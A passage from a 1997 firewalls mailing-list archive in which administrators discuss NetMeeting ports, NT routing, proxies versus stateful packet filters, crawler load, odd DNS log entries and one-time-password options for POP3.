, "Ron DuFresne" Cc: Subject: Re: MS TCP/IP BUG ?! Date: Thu, 5 Jun 1997 01:06:54 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > it is worth noting that a well configured firewall would render this a > non-issue at all hosts other than servers on the DMZ which should be > relatively easy to protect with patches or alternate operating systems. That's right, SP4 will be the latest version of RedHat Linux :-) David From owner-firewalls-outgoing Fri Jun 6 14:31:33 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA22069 for firewalls-outgoing; Fri, 6 Jun 1997 13:56:42 -0700 (PDT) Received: from desiree.teleport.com (desiree.teleport.com [192.108.254.21]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA22004 for ; Fri, 6 Jun 1997 13:56:24 -0700 (PDT) Received: from linda.teleport.com (linda.teleport.com [192.108.254.12]) by desiree.teleport.com (8.8.5/8.7.3) with ESMTP id OAA10014 for ; Fri, 6 Jun 1997 14:00:30 -0700 (PDT) Received: (from alano@localhost) by linda.teleport.com (8.8.5/8.8.4) id OAA21647; Fri, 6 Jun 1997 14:00:29 -0700 (PDT) Date: Fri, 6 Jun 1997 14:00:29 -0700 (PDT) From: Alan To: firewalls@greatcircle.com Subject: Commonly hacked ports Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am setting up a few booby traps (ala Klaxon and the like) for various ports on my firewall at work. Any suggestions as to "commonly hacked ports" that I should put detectors on? (I am currently covering the obvious ones like tftp and nfsd.) Also, suggestions on good ways to identify attackers (other than identd and finger) are also welcome. alano@teleport.com | "Those who are without history are doomed to retype it." From owner-firewalls-outgoing Fri Jun 6 15:34:19 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA21168 for firewalls-outgoing; Fri, 6 Jun 1997 11:09:34 -0700 (PDT) Received: from palrel3.hp.com (palrel3.hp.com [156.153.255.219]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA21134 for ; Fri, 6 Jun 1997 11:09:19 -0700 (PDT) Received: from cup46ux.cup.hp.com (daemon@cup46ux.cup.hp.com [15.9.88.31]) by palrel3.hp.com with ESMTP (8.7.5/8.7.3) id LAA17705 for ; Fri, 6 Jun 1997 11:13:28 -0700 (PDT) Received: from f2426bre.nsr.hp.com by cup46ux.cup.hp.com with SMTP (1.37.109.11/15.5+IOS 3.20+cup+OMrelay) id AA273270790; Fri, 6 Jun 1997 11:13:10 -0700 From: beldridg@cup46ux.cup.hp.com (Brett Eldridge) To: Mark_Flanagan@radian.com (Mark Flanagan) Cc: firewalls@GreatCircle.COM Subject: Re: Microsoft NetMeeting Date: Fri, 06 Jun 1997 18:09:47 GMT Message-Id: <33995163.666930@cup46ux.cup.hp.com> References: <000D79B8.3356@radian.com> In-Reply-To: <000D79B8.3356@radian.com> X-Mailer: Forte Agent 1.0/32.390 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 1997 10:51:53 -0500, you wrote: > Does anyone have or can you point me to a site with the particulars= on=20 > Microsoft NetMeeting. I'm looking for the protocol, ports, = security=20 > risks, etc. > =20 This question seems to come up all the time. Here is some stuff from a post about a month ago. It gives the port and protocol info. The security risks depend upon your individual situation. Since it is an unknown protocol and needs to open up the high ports, I would consider it a risk. - brett I have included a portion of the text from one of Microsoft's KnowledgeBse articles. You can find the article at: http://www.microsoft.com/kb/articles/q164/0/38.htm - brett ---- Text of article ---- Microsoft Netmeeting 2.0 uses several secondary TCP and UDP ports to communicate. To allow NetMeeting to communicate fully, the following ports need to be enabled on the WinSock portion of the Proxy Server:=20 389 Internet Locator Server 522 User Location Server 1503 T.120 Protocol 1720 H.323 call setup (TCP) 1731 Audio call control (TCP) Dynamic H.323 Call Control (TCP) Dynamic H.323 streaming (RTP over UDP) =20 Port or Range Type Direction ------------- ---- --------- 389 TCP Inbound 389 TCP OutBound 522 TCP Inbound 522 TCP Outbound 1025-65535 TCP Inbound 1025-65535 TCP Outbound 1025-65535 UDP Inbound 1025-65535 UDP Outbound From owner-firewalls-outgoing Fri Jun 6 15:46:25 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA24442 for firewalls-outgoing; Fri, 6 Jun 1997 14:08:10 -0700 (PDT) Received: from 158.152.116.88 (threewiz.demon.co.uk [158.152.116.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA24404 for ; Fri, 6 Jun 1997 14:07:57 -0700 (PDT) Received: from monaco (unverified [192.168.1.2]) by monaco.kimble.co.uk (EMWAC SMTPRS 0.83) with SMTP id ; Thu, 05 Jun 1997 01:17:46 +0100 Message-ID: From: "David Harvey-George" To: "Steve Rudolph" , Subject: Re: FW-1 and IP Forwarding on NT Box Date: Thu, 5 Jun 1997 00:14:29 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I followed all of microsoft's reccomendations. Possibly a bad move. > Two nic cards a and b Sounds like the start of a stand-up comedy routine > > A is set with default gateway of b > and b is set with gateway of a it is! Okay, look, the system with the two cards knows how to route to each network. All you've gotta do is set up the default gateway for workstations on network A (NIC A) and the default gateway for workstations on network B (NIC B). Don't touch anything on the router (other than enabling IP forwarding) if your network really is this simple (e.g. no other routes). If you have other routes then use the route command directly. > Workstations can ping a and b > Workstations cannot ping network b > Ip forwarding is enabled and my route print matches exactly the format of > microsofts reccomendations. > > I really need to get this up and running. I would get you the route print, > but I cannot get the addresses to copy onto the clip board..duh :) I think you better send us the output from netstat on both the 'router' and the workstations. Run netstat -rn from a DoZ window, click on the little Doz icon at the left of the title bar, select edit/mark, mark the stuff you want to send, copy it and paste it. David From owner-firewalls-outgoing Fri Jun 6 15:53:37 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA21022 for firewalls-outgoing; Fri, 6 Jun 1997 11:08:25 -0700 (PDT) Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA20915 for ; Fri, 6 Jun 1997 11:08:05 -0700 (PDT) Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA09170; Fri, 6 Jun 1997 14:11:41 -0400 Received: from vaxa.PIOS.COM (vaxa.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJR725QHG08WZ4WY@gemini.pios.com> for firewalls@greatcircle.com; Fri, 06 Jun 1997 14:13:41 -0400 (EDT) Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJR6ZPOAOG8Y6LRO@PIOS.PIOS.COM>; Fri, 06 Jun 1997 14:11:43 -0400 (EDT) Date: Fri, 06 Jun 1997 11:15:43 -0700 From: Bill Stout Subject: Re: Stateful Packet Filters vs. Proxies X-Sender: stoutb@vaxf.pios.com To: Ryan Russell/SYBASE , firewalls Message-Id: <2.2.32.19970606181543.0074a4a4@vaxf.pios.com> Mime-Version: 1.0 X-Mailer: Windows Eudora Pro Version 2.2 (32) Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forgive my criticisms: The paper is founded on some incorrect assumptions. It groups application specific proxies with generic proxies. Generic or 'plug-gw' proxies are not desireable because they don't filter application commands, and are viewed as nearly as weak as packet filtering. Application specific proxies are aware (to varying levels) of application commands. A proxy server typically comprises of application specific proxies, and does not comprise of only generic proxies. Generic proxies are avoided at all costs, at least until management wants 'something added'. Occasionally generic proxies are used as last resort, then replaced, for example RealAudio and SQLnet were initially filtered with plug-gw proxies until application (RealAudio/SQLnet) specific proxies were released. The paper then continues to compare generic proxy functions with packet filters and concludes they are the same. A discussion on NAT ensues which is not an equivalent technology to either. Bill Stout At 12:29 AM 6/6/97 -0400, Ryan Russell/SYBASE wrote: >Well, I finally got around to writing down my arguments >on the above subject. Check it out at: > >http://futon.sfsu.edu/~rrussell/spfvprox.htm > >Warning: It's lengthy. > >Comments welcome. > > Ryan > _____________________________________________________________________________ Bill Stout (Systems Engineer/Consultant) stoutb@pios.com Pioneer Standard (Computer Systems & Components) http://www.pios.com/ San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 *My opinions do not reflect that of the company, and visa-versa, thankfully.* From owner-firewalls-outgoing Fri Jun 6 15:58:48 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA21377 for firewalls-outgoing; Fri, 6 Jun 1997 13:52:59 -0700 (PDT) Received: from desiree.teleport.com (desiree.teleport.com [192.108.254.21]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA21345 for ; Fri, 6 Jun 1997 13:52:45 -0700 (PDT) Received: from linda.teleport.com (linda.teleport.com [192.108.254.12]) by desiree.teleport.com (8.8.5/8.7.3) with ESMTP id NAA08375; Fri, 6 Jun 1997 13:56:53 -0700 (PDT) Received: (from alano@localhost) by linda.teleport.com (8.8.5/8.8.4) id NAA21089; Fri, 6 Jun 1997 13:56:52 -0700 (PDT) Date: Fri, 6 Jun 1997 13:56:52 -0700 (PDT) From: Alan To: Joe Klemmer cc: firewalls@GreatCircle.COM Subject: Re: nt web server log In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 6 Jun 1997, Joe Klemmer wrote: > On Fri, 6 Jun 1997, Eric Schult wrote: > > > > There is no file or image that is related to this file name on our web > > > page. Could not even find it on the server anywhere. Am I unduly > > > concerned? > > > > No, don't be concerned. Many (well behaved) web indexers (and other "robots") > > will look for this file, which may contain instructions to NOT index > > a particular site. > > > > I don't know what you'd put in it, I only know that its use is not > > a threat. > > It may not be a direct threat but it can be an indirect one. > There was a very good article last year about how not using robots.txt in > some cases can bring your system to a crawling halt. I believe the > article was in Web Techniques and it told how one web site was completely > swamped by requests from the crawlers that it forces the CPU usage up to > near 100% and thus made the site inaccessible. It was not an attack or > anything but it had the same effect as a Denial of Service attack. The article was on a robot that got caught in the cgi for the genome database. It tried to index a few million (cgi generated) pages of data. robots.txt will protect against well written web crawlers, but not against ones that ignore robots.txt. (There have been a few spotted.) The only way to deal with those is heavy weaponry. [Why am I reminded of the SNL parody commercial selling "Killer Robot protection insurance to senior citizens...? Must be a friday thing...] alano@teleport.com | "Those who are without history are doomed to retype it." From owner-firewalls-outgoing Fri Jun 6 15:58:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA24462 for firewalls-outgoing; Fri, 6 Jun 1997 14:08:21 -0700 (PDT) Received: from 158.152.116.88 (threewiz.demon.co.uk [158.152.116.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA24441 for ; Fri, 6 Jun 1997 14:08:06 -0700 (PDT) Received: from monaco (unverified [192.168.1.2]) by monaco.kimble.co.uk (EMWAC SMTPRS 0.83) with SMTP id ; Thu, 05 Jun 1997 01:17:46 +0100 Message-ID: From: "David Harvey-George" To: Subject: Re: Microsoft Proxy Server Date: Thu, 5 Jun 1997 01:03:18 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Daniel T. Tamagochi wrote:- > Microsoft's Proxy Server was subjected to extensive security testing and > evaluation from independent testing agency, Coopers & Lybrand's Information > Technology Security Services and is resistant to common attacks such as "IP > Spoofing", 'SATAN", and "ISS." This level of security is not typically > found other proxy servers on the market. Erm, its found on AltaVista firewall for one. Anyway SATAN isn't a great tool for testing NT network security so I would expect MS Proxy to be okay. Dunno about Coopers and Lybrand, this paragraph particulary struck me when I read the original M$ B$, they may be great guys, they may have hired great guys but who's actually heard of them in this context? The refs to SATAN worry me, bit like taking a lock-picker's kit to a biometric entry system. > Integrated Dial-Up Networking Support- using the Auto-Dial tool, Microsoft > Proxy Server provides exceptional support for networks that use dial-up > links for access to the Internet. Yeah, its a bit crap on version 1.0 though. The rest of the proxy server is okay but calling it a firewall solution is a bit rich. I think the AltaVista proxy firewall is a bit more like it. As far as proxies go, I've found the Netscrape or WinGate proxies better solutions on the NT platform for many uses. David From owner-firewalls-outgoing Fri Jun 6 17:06:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA09946 for firewalls-outgoing; Fri, 6 Jun 1997 15:28:26 -0700 (PDT) Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id NAA18163 for ; Fri, 6 Jun 1997 13:39:31 -0700 (PDT) Received: (qmail 27398 invoked from smtpd); 6 Jun 1997 20:43:22 -0000 Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 6 Jun 1997 20:43:22 -0000 Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id PAA02899; Fri, 6 Jun 1997 15:43:22 -0500 Received: by sonic.nmti.com; id AA13457; Fri, 6 Jun 1997 15:44:12 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9706062044.AA13457@sonic.nmti.com.nmti.com> Subject: Re: nt web server log To: klemmerj@webtrek.com Date: Fri, 6 Jun 1997 15:44:11 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Joe Klemmer" at Jun 6, 97 03:15:02 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > It may not be a direct threat but it can be an indirect one. > There was a very good article last year about how not using robots.txt in > some cases can bring your system to a crawling halt. I believe the > article was in Web Techniques and it told how one web site was completely > swamped by requests from the crawlers that it forces the CPU usage up to > near 100% and thus made the site inaccessible. It was not an attack or > anything but it had the same effect as a Denial of Service attack. I had about 10,000 pages on my home box indexed by the crawlers last year. It took 7 months of begging to get them out. In the meantime my phone line was busy 100% for 3 weeks until I figured out what the problem was, and then it was pretty clogged even though my webserver was 404ing everything. What happened was *one* crawler managed to grab something in a server I was running at home, testing out some web pages before deploying them. Then it turned into a feeding frenzy. The really annoying thing was that these sites were returning pages at my home box INSTEAD of the more recently updated ones online! The thing is, if a webcrawler is returning pages that have been sending a 404 for 7 months, how much can it be trusted? From owner-firewalls-outgoing Fri Jun 6 17:16:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA14663 for firewalls-outgoing; Fri, 6 Jun 1997 15:46:29 -0700 (PDT) Received: from swissbank.swissbank.com (sb.swissbank.com [146.180.1.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id PAA14575 for ; Fri, 6 Jun 1997 15:46:07 -0700 (PDT) Received: from localhost by swissbank.swissbank.com (4.1/BK-1.9) id AA19863; Fri, 6 Jun 97 17:52:42 CDT Date: Fri, 6 Jun 1997 17:52:41 -0500 (CDT) From: Tod McQuillin X-Sender: mcquilt@sb.swissbank.com To: Ian Miller Cc: Doug Luce , Firewalls mailing list Subject: Re: Unknown log entry... In-Reply-To: <199706060840.JAA03650@h01.scientia.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is set up along the lines described in the internet draft "Classless IN-ADDR.ARPA delegation", available at http://ds.internic.net/internet-drafts/draft-ietf-dnsind-classless-inaddr-03.txt If your firewall isn't able to cope with this it probably should -- this sort of setup is becoming more and more common as subnets smaller than 8 bits are being delegated to different zones of authority. -- Tod McQuillin On Fri, 6 Jun 1997, Ian Miller wrote: > [Also sent to Firewalls mailing list , the source > of the message I am replying to - Ian] > > At 19:05 05/06/97 -0700, Cihan Subasi wrote: > >I had those two line in my firewall logs, can anybody explain me what > >are they??? > > > >-------------------------------------------------- > >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for > >"66.3.196.208.in-addr.arpa IN PTR", got type "CNAME" > >Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for > >"66.3.196.208.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa" > >-------------------------------------------------- > > Your mail server has tried to do a reverse lookup on IP address 208.196.3.66 > (karnov.lm.com) > and has got some VERY odd results. Reverse lookup on IP address > ... is done by looking domain ....in-addr.arpa. > This should contain PTR (name->IP) records. However if you look up > 208.196.3.66 you get:- > CNAME/ARPA "66.3.196.208.in-addr.arpa" 6h "66.64.3.196.208.in-addr.arpa" > CNAME records are name->name (alias) records. This is wierd for an > in-addr.arpa domain and it has not surprisingly confused your firewall. If > you follow up the (I think non-sensical CNAME) you get. > > PTR/ARPA "66.64.3.196.208.in-addr.arpa" 1d "karnov.lm.com" > > I have no idea why this DNS is set-up this. > > Ian > > From owner-firewalls-outgoing Fri Jun 6 17:31:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA21376 for firewalls-outgoing; Fri, 6 Jun 1997 13:52:59 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA21273 for ; Fri, 6 Jun 1997 13:52:30 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id OAA05426 for ; Fri, 6 Jun 1997 14:00:01 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA21372; Fri, 6 Jun 97 13:57:48 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id NAA23016 for @sybgate.sybase.com:firewalls@greatcircle.com; Fri, 6 Jun 1997 13:56:42 -0700 (PDT) Message-Id: <199706062056.NAA23016@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id BDBC4A4A2FA27CE8882564AE00713161; Fri, 6 Jun 97 13:56:41 EDT To: Bill Stout Cc: firewalls From: Ryan Russell/SYBASE Date: 6 Jun 97 14:03:46 EDT Subject: Re: Stateful Packet Filters vs. Proxies X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Criticisms are welcome. I was thinking today that I should say more about application-specific proxies vs. generic proxies. Socks is a good example of a generic proxy (at least I believe that is the case) and is indeed roughly equivalent to a packet filter, which is one of my points. At least you agree on that. One of the things I'd like to have to better educate myself is a list of proxies that do a good job of understanding and interacting with the protocols. But, I think my point still stands, that if you have more than a couple of protocols you have to proxy, and you want to utilize non-generic proxies, then you will end up using unrelated proxy software for some of the protocols (Your examples of RealAudio and SQLNet are good ones) and they will have different feature sets, security models, and yes, bugs. Translate bugs to mean potential holes or weaknesses. The converse of that could be: If you have n proxies that all understand and interact with the protocol in a meaningful way, and they all have 0 bugs, and they work exactly how you want, isn't that better than a layer 4 SPF? Yup. The above situation is a case where a SPF, as a unified security program, may be a better choice. It would be extreamly difficult to pick the cutoff point (i.e. if you have 5 proxies, just go to SPF) given that you probably lose some control over the protocols that you had before, but are now dealing with less holes, etc.. BTW, doesn't the proxy for SQLNet exist because the protocol is complex, not to increase correctness of the data? I.e. a non-stateful packet filter would have to leave too many ports "open"? As for the last part of your note: I'll go back and re-read how I worded my conclusions, but what I mean to say is that generic proxies are equivalent to stateful packet filters. I also conclude that NAT is darn close to a generic proxy and a SPF, if you are using many-to-few translation and the NAT device doesn't allow the outside to initiate connections, which is probably a side-effect of most implmentations of many-to-few NAT. Thanks for the feedback. Ryan ---------- Previous Message ---------- To: Ryan.Russell, firewalls cc: From: stoutb@pios.com (Bill Stout) @ smtp Date: 06/06/97 11:15:43 AM Subject: Re: Stateful Packet Filters vs. Proxies Forgive my criticisms: The paper is founded on some incorrect assumptions. It groups application specific proxies with generic proxies. Generic or 'plug-gw' proxies are not desireable because they don't filter application commands, and are viewed as nearly as weak as packet filtering. Application specific proxies are aware (to varying levels) of application commands. A proxy server typically comprises of application specific proxies, and does not comprise of only generic proxies. Generic proxies are avoided at all costs, at least until management wants 'something added'. Occasionally generic proxies are used as last resort, then replaced, for example RealAudio and SQLnet were initially filtered with plug-gw proxies until application (RealAudio/SQLnet) specific proxies were released. The paper then continues to compare generic proxy functions with packet filters and concludes they are the same. A discussion on NAT ensues which is not an equivalent technology to either. Bill Stout At 12:29 AM 6/6/97 -0400, Ryan Russell/SYBASE wrote: >Well, I finally got around to writing down my arguments >on the above subject. Check it out at: > >http://futon.sfsu.edu/~rrussell/spfvprox.htm > >Warning: It's lengthy. > >Comments welcome. > > Ryan > _____________________________________________________________________________ Bill Stout (Systems Engineer/Consultant) stoutb@pios.com Pioneer Standard (Computer Systems & Components) http://www.pios.com/ San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 *My opinions do not reflect that of the company, and visa-versa, thankfully.* From owner-firewalls-outgoing Fri Jun 6 18:36:37 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA00787 for firewalls-outgoing; Fri, 6 Jun 1997 16:58:21 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA21279 for ; Fri, 6 Jun 1997 16:18:16 -0700 (PDT) Received: from riccione.guest.net ([195.103.69.129]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id QAA12137 for ; Fri, 6 Jun 1997 16:17:41 -0700 (PDT) Received: from ([195.103.69.164]) by riccione.guest.net (8.6.11/8.6.9) with SMTP id CAA03126 for ; Sat, 7 Jun 1997 02:22:08 +0200 Message-ID: <33986643.466A@guest.net> Date: Fri, 06 Jun 1997 12:34:27 -0700 From: "A. C." X-Mailer: Mozilla 2.0 (Win16; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: Secure Pop3? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bradley Smith wrote: > > Try the APOP option.. Granted, it's not much, but it's better than > cleartext. > > Alternatively, if you're into S&M you could kerberize it :-) > Or, you could go to something like S/Key or SecurID. > > -brad > What is S/Key ? I have seen this on telnet session, after give login name. From owner-firewalls-outgoing Fri Jun 6 19:01:27 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA22012 for firewalls-outgoing; Fri, 6 Jun 1997 18:52:16 -0700 (PDT) Received: from proxy4.ba.best.com (proxy4.ba.best.com [206.184.139.15]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA21950 for ; Fri, 6 Jun 1997 18:51:51 -0700 (PDT) Received: from shellx.best.com (shellx.best.com [206.86.0.11]) by proxy4.ba.best.com (8.8.5/8.8.3) with ESMTP id SAA00515; Fri, 6 Jun 1997 18:54:02 -0700 (PDT) Received: from localhost (kgibbs@localhost) by shellx.best.com (8.8.5/8.8.3) with SMTP id SAA18616; Fri, 6 Jun 1997 18:51:56 -0700 (PDT) Date: Fri, 6 Jun 1997 18:51:55 -0700 (PDT) From: "Kelly E. Gibbs" To: Ryan Russell/SYBASE cc: Bill Stout , firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: <199706062056.NAA23016@notesgw2.sybase.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At what level does the NAT occur in the OSI model? So far I've heard 2 and 4... whats the right answer? On 6 Jun 1997, Ryan Russell/SYBASE wrote: > Criticisms are welcome. > > I was thinking today that I should say more about > application-specific proxies vs. generic proxies. > Socks is a good example of a generic proxy (at > least I believe that is the case) and is indeed > roughly equivalent to a packet filter, which is one > of my points. At least you agree on that. > > One of the things I'd like to have to better educate > myself is a list of proxies that do a good job of > understanding and interacting with the protocols. > > But, I think my point still stands, that if you have > more than a couple of protocols you have to > proxy, and you want to utilize non-generic proxies, > then you will end up using unrelated proxy software > for some of the protocols (Your examples of > RealAudio and SQLNet are good ones) and they will > have different feature sets, security models, and yes, > bugs. Translate bugs to mean potential holes or > weaknesses. > > The converse of that could be: If you have n proxies > that all understand and interact with the protocol > in a meaningful way, and they all have 0 bugs, > and they work exactly how you want, isn't that > better than a layer 4 SPF? Yup. > > The above situation is a case where a SPF, as a > unified security program, may be a better choice. > It would be extreamly difficult to pick the cutoff > point (i.e. if you have 5 proxies, just go to SPF) given > that you probably lose some control over the protocols > that you had before, but are now dealing with less holes, etc.. > > BTW, doesn't the proxy for SQLNet exist because the > protocol is complex, not to increase correctness of the > data? I.e. a non-stateful packet filter would have to leave > too many ports "open"? > > As for the last part of your note: I'll go back and > re-read how I worded my conclusions, but what I mean > to say is that generic proxies are equivalent to > stateful packet filters. > > I also conclude that NAT is darn close to a generic proxy > and a SPF, if you are using many-to-few translation > and the NAT device doesn't allow the outside to initiate > connections, which is probably a side-effect of most > implmentations of many-to-few NAT. > > Thanks for the feedback. > Ryan > > > ---------- Previous Message ---------- > To: Ryan.Russell, firewalls > cc: > From: stoutb@pios.com (Bill Stout) @ smtp > Date: 06/06/97 11:15:43 AM > Subject: Re: Stateful Packet Filters vs. Proxies > > Forgive my criticisms: > > The paper is founded on some incorrect assumptions. > > It groups application specific proxies with generic proxies. Generic or > 'plug-gw' proxies are not desireable because they don't filter application > commands, and are viewed as nearly as weak as packet filtering. Application > specific proxies are aware (to varying levels) of application commands. > > A proxy server typically comprises of application specific proxies, and does > not comprise of only generic proxies. Generic proxies are avoided at all > costs, at least until management wants 'something added'. Occasionally > generic proxies are used as last resort, then replaced, for example > RealAudio and SQLnet were initially filtered with plug-gw proxies until > application (RealAudio/SQLnet) specific proxies were released. > > The paper then continues to compare generic proxy functions with packet > filters and concludes they are the same. A discussion on NAT ensues which > is not an equivalent technology to either. > > Bill Stout > > At 12:29 AM 6/6/97 -0400, Ryan Russell/SYBASE wrote: > >Well, I finally got around to writing down my arguments > >on the above subject. Check it out at: > > > >http://futon.sfsu.edu/~rrussell/spfvprox.htm > > > >Warning: It's lengthy. > > > >Comments welcome. > > > > Ryan > > > _____________________________________________________________________________ > Bill Stout (Systems Engineer/Consultant) stoutb@pios.com > Pioneer Standard (Computer Systems & Components) http://www.pios.com/ > San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 > *My opinions do not reflect that of the company, and visa-versa, thankfully.* > > > > > From owner-firewalls-outgoing Fri Jun 6 19:16:27 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA01014 for firewalls-outgoing; Fri, 6 Jun 1997 16:59:49 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA21291 for ; Fri, 6 Jun 1997 16:18:17 -0700 (PDT) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id QAA12383 for ; Fri, 6 Jun 1997 16:20:51 -0700 (PDT) Received: (from cibir@localhost) by netcom.netcom.com (8.6.13/Netcom) id QAA06224; Fri, 6 Jun 1997 16:18:33 -0700 Date: Fri, 6 Jun 1997 16:18:32 -0700 (PDT) From: Joseph Seanor Subject: Re: IP SPOOFING To: -= TaLoN =- cc: firewalls@GreatCircle.COM In-Reply-To: <339FE10D.7AB3@Who.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 12 Jun 1997, -= TaLoN =- wrote: > Also, looking for assistance in finding information on people. (i.e. > SSN, CREDIT RECORDS, ETC.) please email me AS SOON as you get any > information. > Once Again, please email me : Talon@mail.org > > Jason Burton - Certified Network Investigator > Vector Classified Section Just to let you know that by trying to gather this type of information that is listed above, you could be breaking your local State laws, and by trying to get Credit Records you are breaking Federal regulations. Joseph Seanor CIBIR Corporation Computer Crime Investigators Licensed & Insured Private Investigators From owner-firewalls-outgoing Fri Jun 6 19:29:24 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA01353 for firewalls-outgoing; Fri, 6 Jun 1997 17:01:44 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA21496 for ; Fri, 6 Jun 1997 16:19:22 -0700 (PDT) Received: from gate (MNA-cal-mcc-a-pvc253.econnect.net [204.50.214.50]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id QAA12169 for ; Fri, 6 Jun 1997 16:18:01 -0700 (PDT) Received: from a01fs002.nsci.net ([10.1.1.20]) by gate.mcc.net with ESMTP id <324837-14622>; Fri, 6 Jun 1997 17:15:38 -0600 Received: by A01FS002.mcc.net with Internet Mail Service 